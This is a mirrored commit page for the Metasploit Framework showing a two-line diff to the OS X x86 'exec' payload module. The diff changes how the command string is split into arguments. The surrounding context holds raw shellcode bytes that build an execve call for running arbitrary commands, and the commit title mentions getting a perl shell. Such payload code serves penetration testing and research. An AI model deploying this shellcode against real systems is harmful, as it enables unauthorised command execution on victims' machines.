infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Shellwords! Now you can use exec to get you a perl shell

unstable
Joe Vennix 2013-07-17 21:15:59 -05:00
parent 9c1228067c
commit 766a8d5817
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/payloads/singles/osx/x86/exec.rb
View File

@ -48,7 +48,7 @@ module Metasploit3
def generate_stage
cmd_str = datastore['CMD'] || ''
# Split the cmd string into arg chunks
cmd_parts = cmd_str.split(/[\s]+/)
cmd_parts = Shellwords.shellsplit(cmd_str)
# the non-exe-path parts of the chunks need to be reversed for execve
cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
@ -61,7 +61,7 @@ module Metasploit3
# now EBX contains &cmd_parts[0], the exe path
if cmd_parts.length > 1
# Build an array of pointers to the arguments we copied on to the stack
# Build an array of pointers to arguments
payload += "\x89\xD9" + # mov ecx, ebx
"\x50" + # push eax; null byte (end of array)
"\x89\xe2" # mov edx, esp (EDX points to the end-of-array null byte)